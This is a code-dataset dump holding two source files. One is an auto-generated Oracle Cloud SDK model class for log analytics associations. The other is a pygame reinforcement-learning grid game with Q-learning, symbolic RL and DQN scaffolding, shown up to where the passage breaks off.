repo_name
stringlengths
7
94
repo_path
stringlengths
4
237
repo_head_hexsha
stringlengths
40
40
content
stringlengths
10
680k
apis
stringlengths
2
840k
Manny27nyc/oci-python-sdk
src/oci/log_analytics/models/log_analytics_association.py
de60b04e07a99826254f7255e992f41772902df7
# coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401 from oci.decorators import init_model_state_from_kwargs @init_model_state_from_kwargs class LogAnalyticsAssociation(object): """ LogAnalyticsAssociation """ #: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation. #: This constant has a value of "ACCEPTED" LIFE_CYCLE_STATE_ACCEPTED = "ACCEPTED" #: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation. #: This constant has a value of "IN_PROGRESS" LIFE_CYCLE_STATE_IN_PROGRESS = "IN_PROGRESS" #: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation. #: This constant has a value of "SUCCEEDED" LIFE_CYCLE_STATE_SUCCEEDED = "SUCCEEDED" #: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation. #: This constant has a value of "FAILED" LIFE_CYCLE_STATE_FAILED = "FAILED" def __init__(self, **kwargs): """ Initializes a new LogAnalyticsAssociation object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param failure_message: The value to assign to the failure_message property of this LogAnalyticsAssociation. :type failure_message: str :param agent_id: The value to assign to the agent_id property of this LogAnalyticsAssociation. :type agent_id: str :param time_last_attempted: The value to assign to the time_last_attempted property of this LogAnalyticsAssociation. :type time_last_attempted: datetime :param retry_count: The value to assign to the retry_count property of this LogAnalyticsAssociation. :type retry_count: int :param source_name: The value to assign to the source_name property of this LogAnalyticsAssociation. :type source_name: str :param source_display_name: The value to assign to the source_display_name property of this LogAnalyticsAssociation. :type source_display_name: str :param source_type_name: The value to assign to the source_type_name property of this LogAnalyticsAssociation. :type source_type_name: str :param life_cycle_state: The value to assign to the life_cycle_state property of this LogAnalyticsAssociation. Allowed values for this property are: "ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type life_cycle_state: str :param entity_id: The value to assign to the entity_id property of this LogAnalyticsAssociation. :type entity_id: str :param entity_name: The value to assign to the entity_name property of this LogAnalyticsAssociation. :type entity_name: str :param entity_type_name: The value to assign to the entity_type_name property of this LogAnalyticsAssociation. :type entity_type_name: str :param host: The value to assign to the host property of this LogAnalyticsAssociation. :type host: str :param agent_entity_name: The value to assign to the agent_entity_name property of this LogAnalyticsAssociation. :type agent_entity_name: str :param entity_type_display_name: The value to assign to the entity_type_display_name property of this LogAnalyticsAssociation. :type entity_type_display_name: str :param log_group_id: The value to assign to the log_group_id property of this LogAnalyticsAssociation. :type log_group_id: str :param log_group_name: The value to assign to the log_group_name property of this LogAnalyticsAssociation. :type log_group_name: str :param log_group_compartment: The value to assign to the log_group_compartment property of this LogAnalyticsAssociation. :type log_group_compartment: str """ self.swagger_types = { 'failure_message': 'str', 'agent_id': 'str', 'time_last_attempted': 'datetime', 'retry_count': 'int', 'source_name': 'str', 'source_display_name': 'str', 'source_type_name': 'str', 'life_cycle_state': 'str', 'entity_id': 'str', 'entity_name': 'str', 'entity_type_name': 'str', 'host': 'str', 'agent_entity_name': 'str', 'entity_type_display_name': 'str', 'log_group_id': 'str', 'log_group_name': 'str', 'log_group_compartment': 'str' } self.attribute_map = { 'failure_message': 'failureMessage', 'agent_id': 'agentId', 'time_last_attempted': 'timeLastAttempted', 'retry_count': 'retryCount', 'source_name': 'sourceName', 'source_display_name': 'sourceDisplayName', 'source_type_name': 'sourceTypeName', 'life_cycle_state': 'lifeCycleState', 'entity_id': 'entityId', 'entity_name': 'entityName', 'entity_type_name': 'entityTypeName', 'host': 'host', 'agent_entity_name': 'agentEntityName', 'entity_type_display_name': 'entityTypeDisplayName', 'log_group_id': 'logGroupId', 'log_group_name': 'logGroupName', 'log_group_compartment': 'logGroupCompartment' } self._failure_message = None self._agent_id = None self._time_last_attempted = None self._retry_count = None self._source_name = None self._source_display_name = None self._source_type_name = None self._life_cycle_state = None self._entity_id = None self._entity_name = None self._entity_type_name = None self._host = None self._agent_entity_name = None self._entity_type_display_name = None self._log_group_id = None self._log_group_name = None self._log_group_compartment = None @property def failure_message(self): """ Gets the failure_message of this LogAnalyticsAssociation. The failure message. :return: The failure_message of this LogAnalyticsAssociation. :rtype: str """ return self._failure_message @failure_message.setter def failure_message(self, failure_message): """ Sets the failure_message of this LogAnalyticsAssociation. The failure message. :param failure_message: The failure_message of this LogAnalyticsAssociation. :type: str """ self._failure_message = failure_message @property def agent_id(self): """ Gets the agent_id of this LogAnalyticsAssociation. The agent unique identifier. :return: The agent_id of this LogAnalyticsAssociation. :rtype: str """ return self._agent_id @agent_id.setter def agent_id(self, agent_id): """ Sets the agent_id of this LogAnalyticsAssociation. The agent unique identifier. :param agent_id: The agent_id of this LogAnalyticsAssociation. :type: str """ self._agent_id = agent_id @property def time_last_attempted(self): """ Gets the time_last_attempted of this LogAnalyticsAssociation. The last attempt date. :return: The time_last_attempted of this LogAnalyticsAssociation. :rtype: datetime """ return self._time_last_attempted @time_last_attempted.setter def time_last_attempted(self, time_last_attempted): """ Sets the time_last_attempted of this LogAnalyticsAssociation. The last attempt date. :param time_last_attempted: The time_last_attempted of this LogAnalyticsAssociation. :type: datetime """ self._time_last_attempted = time_last_attempted @property def retry_count(self): """ Gets the retry_count of this LogAnalyticsAssociation. The number of times the association will be attempted before failing. :return: The retry_count of this LogAnalyticsAssociation. :rtype: int """ return self._retry_count @retry_count.setter def retry_count(self, retry_count): """ Sets the retry_count of this LogAnalyticsAssociation. The number of times the association will be attempted before failing. :param retry_count: The retry_count of this LogAnalyticsAssociation. :type: int """ self._retry_count = retry_count @property def source_name(self): """ Gets the source_name of this LogAnalyticsAssociation. The source name. :return: The source_name of this LogAnalyticsAssociation. :rtype: str """ return self._source_name @source_name.setter def source_name(self, source_name): """ Sets the source_name of this LogAnalyticsAssociation. The source name. :param source_name: The source_name of this LogAnalyticsAssociation. :type: str """ self._source_name = source_name @property def source_display_name(self): """ Gets the source_display_name of this LogAnalyticsAssociation. The source display name. :return: The source_display_name of this LogAnalyticsAssociation. :rtype: str """ return self._source_display_name @source_display_name.setter def source_display_name(self, source_display_name): """ Sets the source_display_name of this LogAnalyticsAssociation. The source display name. :param source_display_name: The source_display_name of this LogAnalyticsAssociation. :type: str """ self._source_display_name = source_display_name @property def source_type_name(self): """ Gets the source_type_name of this LogAnalyticsAssociation. The source type internal name. :return: The source_type_name of this LogAnalyticsAssociation. :rtype: str """ return self._source_type_name @source_type_name.setter def source_type_name(self, source_type_name): """ Sets the source_type_name of this LogAnalyticsAssociation. The source type internal name. :param source_type_name: The source_type_name of this LogAnalyticsAssociation. :type: str """ self._source_type_name = source_type_name @property def life_cycle_state(self): """ Gets the life_cycle_state of this LogAnalyticsAssociation. The lifecycle status. Valid values are ACCEPTED, IN_PROGRESS, SUCCEEDED or FAILED. Allowed values for this property are: "ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The life_cycle_state of this LogAnalyticsAssociation. :rtype: str """ return self._life_cycle_state @life_cycle_state.setter def life_cycle_state(self, life_cycle_state): """ Sets the life_cycle_state of this LogAnalyticsAssociation. The lifecycle status. Valid values are ACCEPTED, IN_PROGRESS, SUCCEEDED or FAILED. :param life_cycle_state: The life_cycle_state of this LogAnalyticsAssociation. :type: str """ allowed_values = ["ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED"] if not value_allowed_none_or_none_sentinel(life_cycle_state, allowed_values): life_cycle_state = 'UNKNOWN_ENUM_VALUE' self._life_cycle_state = life_cycle_state @property def entity_id(self): """ Gets the entity_id of this LogAnalyticsAssociation. The entity unique identifier. :return: The entity_id of this LogAnalyticsAssociation. :rtype: str """ return self._entity_id @entity_id.setter def entity_id(self, entity_id): """ Sets the entity_id of this LogAnalyticsAssociation. The entity unique identifier. :param entity_id: The entity_id of this LogAnalyticsAssociation. :type: str """ self._entity_id = entity_id @property def entity_name(self): """ Gets the entity_name of this LogAnalyticsAssociation. The entity name. :return: The entity_name of this LogAnalyticsAssociation. :rtype: str """ return self._entity_name @entity_name.setter def entity_name(self, entity_name): """ Sets the entity_name of this LogAnalyticsAssociation. The entity name. :param entity_name: The entity_name of this LogAnalyticsAssociation. :type: str """ self._entity_name = entity_name @property def entity_type_name(self): """ Gets the entity_type_name of this LogAnalyticsAssociation. The entity type internal name. :return: The entity_type_name of this LogAnalyticsAssociation. :rtype: str """ return self._entity_type_name @entity_type_name.setter def entity_type_name(self, entity_type_name): """ Sets the entity_type_name of this LogAnalyticsAssociation. The entity type internal name. :param entity_type_name: The entity_type_name of this LogAnalyticsAssociation. :type: str """ self._entity_type_name = entity_type_name @property def host(self): """ Gets the host of this LogAnalyticsAssociation. The host name. :return: The host of this LogAnalyticsAssociation. :rtype: str """ return self._host @host.setter def host(self, host): """ Sets the host of this LogAnalyticsAssociation. The host name. :param host: The host of this LogAnalyticsAssociation. :type: str """ self._host = host @property def agent_entity_name(self): """ Gets the agent_entity_name of this LogAnalyticsAssociation. The name of the entity which contains the agent. :return: The agent_entity_name of this LogAnalyticsAssociation. :rtype: str """ return self._agent_entity_name @agent_entity_name.setter def agent_entity_name(self, agent_entity_name): """ Sets the agent_entity_name of this LogAnalyticsAssociation. The name of the entity which contains the agent. :param agent_entity_name: The agent_entity_name of this LogAnalyticsAssociation. :type: str """ self._agent_entity_name = agent_entity_name @property def entity_type_display_name(self): """ Gets the entity_type_display_name of this LogAnalyticsAssociation. The entity type display name. :return: The entity_type_display_name of this LogAnalyticsAssociation. :rtype: str """ return self._entity_type_display_name @entity_type_display_name.setter def entity_type_display_name(self, entity_type_display_name): """ Sets the entity_type_display_name of this LogAnalyticsAssociation. The entity type display name. :param entity_type_display_name: The entity_type_display_name of this LogAnalyticsAssociation. :type: str """ self._entity_type_display_name = entity_type_display_name @property def log_group_id(self): """ Gets the log_group_id of this LogAnalyticsAssociation. The log group unique identifier. :return: The log_group_id of this LogAnalyticsAssociation. :rtype: str """ return self._log_group_id @log_group_id.setter def log_group_id(self, log_group_id): """ Sets the log_group_id of this LogAnalyticsAssociation. The log group unique identifier. :param log_group_id: The log_group_id of this LogAnalyticsAssociation. :type: str """ self._log_group_id = log_group_id @property def log_group_name(self): """ Gets the log_group_name of this LogAnalyticsAssociation. The log group name. :return: The log_group_name of this LogAnalyticsAssociation. :rtype: str """ return self._log_group_name @log_group_name.setter def log_group_name(self, log_group_name): """ Sets the log_group_name of this LogAnalyticsAssociation. The log group name. :param log_group_name: The log_group_name of this LogAnalyticsAssociation. :type: str """ self._log_group_name = log_group_name @property def log_group_compartment(self): """ Gets the log_group_compartment of this LogAnalyticsAssociation. The log group compartment. :return: The log_group_compartment of this LogAnalyticsAssociation. :rtype: str """ return self._log_group_compartment @log_group_compartment.setter def log_group_compartment(self, log_group_compartment): """ Sets the log_group_compartment of this LogAnalyticsAssociation. The log group compartment. :param log_group_compartment: The log_group_compartment of this LogAnalyticsAssociation. :type: str """ self._log_group_compartment = log_group_compartment def __repr__(self): return formatted_flat_dict(self) def __eq__(self, other): if other is None: return False return self.__dict__ == other.__dict__ def __ne__(self, other): return not self == other
[((585, 15, 585, 40), 'oci.util.formatted_flat_dict', 'formatted_flat_dict', ({(585, 35, 585, 39): 'self'}, {}), '(self)', False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((364, 15, 364, 84), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', ({(364, 51, 364, 67): 'life_cycle_state', (364, 69, 364, 83): 'allowed_values'}, {}), '(life_cycle_state, allowed_values)', False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n')]
zishanqin/Symbolic-transfer
symblic_game/NEW_GAME.py
b553f188ad3f6c6492fcff556ac6f597e56cf43e
'Author: Aimore Resende Riquetti Dutra' '''email: [email protected]''' # -------------------------------------------------------------------------------------------------- # # This code can run 4 different models of Reinforcement Learning: # Q-Learning (QL), DQN, SRL (DSRL), SRL+CS(DSRL_object_near) and some other variations of SRL # The setting for each run can be set at the end of the code # It can load and save the models in Excel form # There are some pre-defined environments, but you can create your own # Press G to get intermediate Graphs and P to stop # -------------------------------------------------------------------------------------------------- # import Class import pprint import random import sys import numpy as np import pygame # from pyglet import clock import pandas as pd import time import json from time import sleep import math import matplotlib.pyplot as plt import os import glob ## Comment this part if not using DQN model: # import keras # from keras.models import Sequential # from keras.layers import Dense, Activation, Flatten # from keras.models import model_from_json # from keras.optimizers import sgd # from keras.utils import plot_model # import tensorflow as tf # from keras.backend.tensorflow_backend import set_session # config = tf.ConfigProto() # config.gpu_options.per_process_gpu_memory_fraction = 0.3 # set_session(tf.Session(config=config)) # ------ environments ------ # region COLOR DEFINITION explore_set = set() explore_dict = dict() white = (255, 255, 255) black = (0, 0, 0) grey = (80, 80, 80) red = (255, 0, 0) blue = (0, 0, 255) green = (0, 255, 0) yellow = (250, 250, 0) pink = (250, 105, 180) # endregion # region PANDAS DEFINITION pd.set_option('display.max_columns', None) pd.set_option('display.large_repr', 'info') desired_width = 180 pd.set_option('display.width', desired_width) pd.set_option('precision', 4) # endregion np.random.seed(123) # For reproducibility pygame.init() # Pygame initialialization pp = pprint.PrettyPrinter(indent=4) actions = ['up', 'down', 'right', 'left'] actions_dict = {'up':0, 'down':1, 'right':2, 'left':3} p_keys = [pygame.K_w, pygame.K_a, pygame.K_s, pygame.K_d] # clock.tick(20) def pop(self): '''Removes a layer instance on top of the layer stack. ''' while self.outputs: self.layers.pop() if not self.layers: self.outputs = [] self.inbound_nodes = [] self.outbound_nodes = [] else: self.layers[-1].outbound_nodes = [] self.outputs = [self.layers[-1].output] self.built = False # region REWARDS negative_reward = 5 # Negative Reward positive_reward = 1 # Positive Reward step_reward = 0 # Reward received by each step # endregion # ------ environments configuration (till line 640) ------ # region TEXT FONTS DEFINITION smallfont = pygame.font.SysFont('comicsansms', 13) smallfont_act = pygame.font.SysFont('arial', 13) mediumfont_act = pygame.font.SysFont('arial', 18, bold=True) pygame.font.init() # endregion # region DISPLAY FUNCTIONS def show_Alg(alg, screen): text = smallfont.render("Alg: " + alg, True, black) screen.blit(text, [5 + 90 * 0, 0]) def show_Samples(sample, screen): text = smallfont.render("Sample: " + str(sample), True, black) screen.blit(text, [60+100*1, 0]) def show_Level(level, screen): text = smallfont.render("Episode: " + str(level), True, black) screen.blit(text, [50+100*2, 0]) def show_Score(score, screen): text = smallfont.render("Score: " + str(score), True, black) screen.blit(text, [50+100*3, 0]) def show_Steps(steps, screen): text = smallfont.render("Steps: " + str(steps), True, black) screen.blit(text, [50+100*4, 0]) def show_Percent(percent, screen): text = smallfont.render("Percent: " + str(['%.2f' % elem for elem in percent]), True, black) screen.blit(text, [5, 30 * 4]) def show_Steps_list(steps_list, screen): text = smallfont.render("Steps_list: " + str(steps_list), True, black) screen.blit(text, [5, 30 * 1]) def show_Act_List(act_list, screen): text = smallfont_act.render("act_list: " + str(act_list), True, black) screen.blit(text, [5, 30 * 2]) def show_Action(act, screen): text = smallfont_act.render("Chosen Action: " + act, True, black) screen.blit(text, [5, 30 * 3]) def show_Env(env, screen): text = mediumfont_act.render("Environment: " + str(env), True, black) screen.blit(text, [50, 30 * 5]) # endregion # region CREATE OBJ_LIST FROM STATE AND RELATIONSHIP LIST BETWEEN AGENT AND OBJECTS ''' CREATE obj_list - FROM env ''' def create_obj_list(env): obj_list_fun = [] tp_list = [] loc_list = [] env = env.transpose() h_max = env.shape[0] # print("h_max", h_max) v_max = env.shape[1] # print("v_max",v_max) for h in range(1, (h_max - 1)): for v in range(1, (v_max - 1)): if env[h][v] != 0: tp_list.append(env[h][v]) loc_list.append((h, v)) for i in range(len(loc_list)): tp = tp_list[i] loc = loc_list[i] obj = Class.Obj(tp, loc) obj_list_fun.append(obj) return obj_list_fun ''' CREATE A RELATIONSHIP LIST BETWEEN AGENT AND OBJECTS - FROM obj_list ''' def relation_obj_list(obj_list, agent_pos): rel_list = [] xA = agent_pos[0] yA = agent_pos[1] # print("xA", xA) # print("yA", yA) for obj in obj_list: xB = obj.loc[0] yB = obj.loc[1] x = xA - xB y = yA - yB loc_dif = (x, y) # loc_dif = (x[0], y[0]) tp = obj.tp obj = Class.Obj(tp, loc_dif) rel_list.append(obj) return rel_list # endregion # region DRAW OBJECTS x_zero_screen = 50 y_zero_screen = 180 size_obj = 37 def draw_objects(agent, positivo_list, negativo_list, wall_list, screen): # Class.Grid.draw_grid(screen) # Uncomment to display a Grid for i in positivo_list: # POSITIVO screen.blit(i.icon, (i.pos[0] * size_obj + x_zero_screen, y_zero_screen + i.pos[1] * size_obj)) for i in negativo_list: # NEGATIVO screen.blit(i.icon, (i.pos[0] * size_obj + x_zero_screen, y_zero_screen + i.pos[1] * size_obj)) screen.blit(agent.icon, (agent.pos[0] * size_obj + x_zero_screen, y_zero_screen + agent.pos[1] * size_obj)) # AGENT for i in wall_list: # WALL screen.blit(i.icon, (i.pos[0] * size_obj + x_zero_screen, y_zero_screen + i.pos[1] * size_obj)) # endregion # region CREATE THE STATE FROM THE ENVIRONMENT def update_state(h_max, v_max, agent, positivo_list, negativo_list, wall_list): # state is defined in terms of symbols not pixels... state = np.zeros((v_max, h_max)).astype(np.int16) for i in positivo_list: state[i.pos[1]][i.pos[0]] = 60 # SYMBOL 60 POSITIVE for i in negativo_list: state[i.pos[1]][i.pos[0]] = 180 # SYMBOL 180 NEGATIVE for i in wall_list: state[i.pos[1]][i.pos[0]] = 255 # SYMBOL 255 # state[agent.pos[1]][agent.pos[0]] = 120 # SYMBOL 60 return state # TODO I have to check if this v_max and h_max have to be declared eveytime # endregion # region ENVIRONMENT CONFIGURATION def environment_conf(s_env): if s_env == 1: v_max = 4 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 1, 0]]) m_posi = np.matrix([[0, 1, 0], [0, 0, 0]]) elif s_env == 2: v_max = 4 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 1]]) m_posi = np.matrix([[0, 0, 1], [0, 0, 0]]) elif s_env == 3: v_max = 4 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[1, 0, 0], [0, 0, 0]]) m_posi = np.matrix([[0, 1, 0], [0, 0, 0]]) elif s_env == 4: v_max = 4 h_max = 4 x_agent = 1 y_agent = 1 m_nega = np.matrix([[0, 0], [0, 0]]) m_posi = np.matrix([[0, 0], [0, 1]]) elif s_env == 5: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.zeros(shape=(v_max - 2, h_max - 2)) m_posi = np.zeros(shape=(v_max - 2, h_max - 2)) while (True): x = random.randrange(0, h_max - 2) y = random.randrange(0, v_max - 2) if x != x_agent-1 or y != y_agent-1: element = (x, y) break m_posi[element] = 1 elif s_env == 6: v_max = 7 h_max = 7 x_agent = 3 y_agent = 3 m_nega = np.zeros(shape=(v_max - 2, h_max - 2)) m_posi = np.zeros(shape=(v_max - 2, h_max - 2)) while (True): x = random.randrange(0, h_max - 2) y = random.randrange(0, v_max - 2) if x != x_agent - 1 or y != y_agent - 1: element = (x, y) break m_posi[element] = 1 elif s_env == 7: v_max = 9 h_max = 9 x_agent = 4 y_agent = 4 m_nega = np.zeros(shape=(v_max - 2, h_max - 2)) m_posi = np.zeros(shape=(v_max - 2, h_max - 2)) while (True): x = random.randrange(0, h_max - 2) y = random.randrange(0, v_max - 2) if x != x_agent - 1 or y != y_agent - 1: element = (x, y) break m_posi[element] = 1 elif s_env == 8: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 0], [1, 0, 1]]) m_posi = np.matrix([[1, 0, 1], [0, 0, 0], [0, 0, 0]]) elif s_env == 9: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[1, 0, 0], [0, 0, 0], [0, 0, 1]]) m_posi = np.matrix([[0, 0, 1], [0, 0, 0], [1, 0, 0]]) elif s_env == 10: v_max = 9 h_max = 9 x_agent = 4 y_agent = 4 m_nega = np.matrix([[1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1]]) m_posi = np.matrix([[0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0]]) elif s_env == 11: v_max = 9 h_max = 9 x_agent = 4 y_agent = 4 element_list = [] for n in range(14): while(True): x = random.randrange(0,7) y = random.randrange(0,7) if x != 3 and y != 3 and (x,y) not in element_list: element = (x, y) break element_list.append(element) m_nega = np.zeros(shape=(v_max-2, h_max-2)) m_posi = np.zeros(shape=(v_max-2, h_max-2)) half = len(element_list) / 2 nega_list = element_list[:int(half)] posi_list = element_list[int(half):] for ele in nega_list: m_nega[ele] = 1 for ele in posi_list: m_posi[ele] = 1 elif s_env == 12: v_max = 3 h_max = 5 x_agent = 2 y_agent = 1 m_nega = np.matrix([1, 0, 0]) m_posi = np.matrix([0, 0, 1]) elif s_env == 13: v_max = 3 h_max = 5 x_agent = 2 y_agent = 1 m_nega = np.matrix([0, 0, 0]) m_posi = np.matrix([1, 0, 1]) elif s_env == 14: v_max = 3 h_max = 6 x_agent = 2 y_agent = 1 m_nega = np.matrix([1, 0, 0, 0]) m_posi = np.matrix([0, 0, 0, 1]) elif s_env == 15: v_max = 3 h_max = 6 x_agent = 2 y_agent = 1 m_nega = np.matrix([0, 0, 0, 0]) m_posi = np.matrix([1, 0, 0, 1]) elif s_env == 16: v_max = 3 h_max = 7 x_agent = 3 y_agent = 1 m_nega = np.matrix([1, 0, 0, 0, 0]) m_posi = np.matrix([0, 0, 0, 0, 1]) elif s_env == 17: v_max = 3 h_max = 7 x_agent = 3 y_agent = 1 m_nega = np.matrix([0, 0, 0, 0, 0]) m_posi = np.matrix([1, 0, 0, 0, 1]) elif s_env == 18: v_max = 3 h_max = 9 x_agent = 4 y_agent = 1 m_nega = np.matrix([1, 0, 0, 0, 0, 0, 0]) m_posi = np.matrix([0, 0, 0, 0, 0, 0, 1]) elif s_env == 19: v_max = 3 h_max = 9 x_agent = 4 y_agent = 1 m_nega = np.matrix([0, 0, 0, 0, 0, 0, 0]) m_posi = np.matrix([1, 0, 0, 0, 0, 0, 1]) elif s_env == 20: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 0], [0, 0, 0]]) m_posi = np.matrix([[1, 0, 1], [0, 0, 0], [0, 1, 0]]) elif s_env == 21: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[0, 1, 0], [0, 0, 0], [1, 0, 1]]) m_posi = np.matrix([[1, 0, 1], [0, 0, 0], [0, 1, 0]]) elif s_env == 22: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 0], [0, 0, 0]]) m_posi = np.matrix([[1, 0, 1], [0, 0, 0], [1, 0, 1]]) if s_env == 31: v_max = 5 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 1, 0], [0, 0, 0]]) m_posi = np.matrix([[0, 1, 0], [0, 0, 0], [0, 0, 0]]) elif s_env == 32: v_max = 5 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 1], [0, 0, 0]]) m_posi = np.matrix([[0, 0, 1], [0, 0, 0], [0, 0, 0]]) elif s_env == 33: v_max = 5 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[1, 0, 0], [0, 0, 0], [0, 0, 0]]) m_posi = np.matrix([[0, 1, 0], [0, 0, 0], [0, 0, 0]]) else: pass "INSTANCE THE wall_list" wall_list = [] for y in range(v_max): for x in range(h_max): if y == v_max - 1 or y == 0 or x == h_max - 1 or x == 0: wall = Class.Wall('wall', x, y) wall_list.append(wall) "INSTANCE THE AGENT" agent = Class.Agent('agent', x_agent, y_agent) "INSTANCE POSITIVE OBJECTS" positivo_list = [] for x in range(m_posi.shape[0]): for y in range(m_posi.shape[1]): if m_posi[x, y] == 1: positivo = Class.Positivo('positivo', y + 1, x + 1) positivo_list.append(positivo) "INSTANCE NEGATIVE OBJECTS" negativo_list = [] for x in range(m_nega.shape[0]): for y in range(m_nega.shape[1]): if m_nega[x, y] == 1: negativo = Class.Negativo('negativo', y + 1, x + 1) negativo_list.append(negativo) return negativo_list, positivo_list, agent, wall_list, h_max, v_max # endregion # region SAVE - LOAD - CREATE def save_model(model, path): model.save_weights(path + ".h5", overwrite=True) with open(path + ".json", "w") as outfile: json.dump(model.to_json(), outfile) def load_model(s_alg, path): optimizer_config = [] print(path) if s_alg == "QL": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model") elif s_alg == "DSRL": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_dist": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_dist_type": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_dist_type_near": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_dist_type_near_propNeg": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_object_near": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_object": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0, 1]) elif s_alg == "DQN": with open(path + ".json", "r") as jfile: model = model_from_json(json.load(jfile)) model.load_weights(path + ".h5") conf = pd.read_excel(path + ".xlsx", sheetname="Run_Conf", header=[0]) # net_conf = conf.loc[[16:20],:] # print("net_conf", net_conf) optimizer = conf.loc[19, "A"] print("op_conf ", optimizer) # pd.Series({'N_actions': net_conf["N_actions"]}), # pd.Series({'Max_memory': net_conf["Max_memory"]}), # pd.Series({'Hidden_size': net_conf["Hidden_size"]}), # pd.Series({'Batch_size': net_conf["Batch_size"]}), # pd.Series({'Optimizer': net_conf["Optimizer"]}), # pd.Series({'lr': op_conf[0]}), # pd.Series({'beta_1': op_conf[1]}), # pd.Series({'beta_2': op_conf[2]}), # pd.Series({'epsilon': op_conf[3]}), # pd.Series({'decay': op_conf[4]}), # pd.Series({'rho': op_conf[5]}) use_optimizer, optimizer_config = define_optimizer(optimizer) model.compile(loss='mse', optimizer=use_optimizer) model.summary() # pass return model, optimizer_config def create_model(s_alg, state_shape, net_conf): optimizer_config = [] if s_alg == "QL": model = pd.DataFrame() model.index.name = ["States", "Action"] elif s_alg == "DSRL" or s_alg == "DSRL_dist" or s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near" or s_alg == "DSRL_object": m_index = pd.MultiIndex(levels=[[''], [""]], labels=[[], []], names=['state', 'actions']) model = pd.DataFrame(index=m_index) elif s_alg == "DQN": model = Sequential() pop(model) model = Sequential() model.add(Dense(net_conf["Hidden_size"], input_dim=state_shape[0]*state_shape[1], activation="relu", name="DENSE_1")) model.add(Dense(net_conf["Hidden_size"], activation='relu', name="DENSE_2")) model.add(Dense(net_conf["N_actions"], name="DENSE_3")) use_optimizer, optimizer_config = define_optimizer(net_conf["Optimizer"]) model.compile(loss='mse', optimizer=use_optimizer) print(model.summary()) # plot_model(model, to_file='model.png') # d3v.d3viz(model.get_output(), 'test.html') return model, optimizer_config # endregion # ------ RL algorithms (till line 1030) ------ # region DQN - CONFIGURATIONS class ExperienceReplay(object): """ During gameplay all the experiences < s, a, r, s’ > are stored in a replay memory. In training, batches of randomly drawn experiences are used to generate the input and target for training. """ def __init__(self, max_memory=100, discount=.9): """ Setup max_memory: the maximum number of experiences we want to store memory: a list of experiences discount: the discount factor for future experience In the memory the information whether the game ended at the state is stored seperately in a nested array [... [experience, game_over] [experience, game_over] ...] """ self.max_memory = max_memory self.memory = list() self.discount = discount def remember(self, states, game_over): # Save a state to memory self.memory.append([states, game_over]) # We don't want to store infinite memories, so if we have too many, we just delete the oldest one if len(self.memory) > self.max_memory: del self.memory[0] # print(">>> states:", states) def get_batch(self, model, batch_size=10): # How many experiences do we have? len_memory = len(self.memory) # Calculate the number of actions that can possibly be taken in the game num_actions = model.output_shape[-1] # Dimensions of the game field env_dim = self.memory[0][0][0].shape[1] # We want to return an input and target vector with inputs from an observed state... inputs = np.zeros((min(len_memory, batch_size), env_dim)) # ...and the target r + gamma * max Q(s’,a’) # Note that our target 